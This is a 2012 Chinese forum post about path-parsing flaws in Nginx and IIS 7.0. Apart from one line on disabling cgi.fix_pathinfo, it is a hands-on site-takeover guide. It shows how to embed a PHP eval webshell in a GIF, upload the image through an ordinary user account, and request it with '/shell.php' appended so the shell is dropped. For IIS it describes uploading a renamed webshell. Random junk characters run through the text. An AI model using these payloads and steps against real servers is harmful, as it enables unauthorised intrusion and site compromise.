IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 9 H9 t1 W6 i0 @
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。
5 ?. u/ ]# }' l( E__________________________________
1 o4 g- V, E# i3 f
+ O" g2 i6 x' y: z; _" a先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载)
2 G7 u% i& W# a7 r) @7 ^先合并一张PHP一句话图片马,合并方法: ' I0 S& d0 ~6 C$ ]& [: ~
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif 5 }8 t5 j, j) X. q+ M
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
5 |- O: A8 ~$ @0 Y图片随便找一张.
( z4 p; C# p) [* f一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 4 t- ^, O# {, i) u. C- A3 Z
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
/ c& d" x7 F. R1 H B6 } h找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。 . W9 o/ x8 [9 ~! j7 _. p
比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
+ _% a t* i7 L& i# N% X则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
6 n: o. Z; x) D, U3 W. ]6 D然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php $ t" p1 Q1 d W% P9 }( S
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 ; o' }% l/ b& Z5 T8 t* [
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。 , h: p) p8 k% [
找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 # \- Z1 h s; Y, V
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
2 g' t7 H+ v4 `6 }) p& P剩下的就随便你去搞吧。
( S/ S0 J- S$ J1 }+ H6 y& ?3 Z5 X( z7 o: T; V" e5 l0 o- P+ w' }
|
发表于 2012-9-27 19:40:10
收藏
支持
反对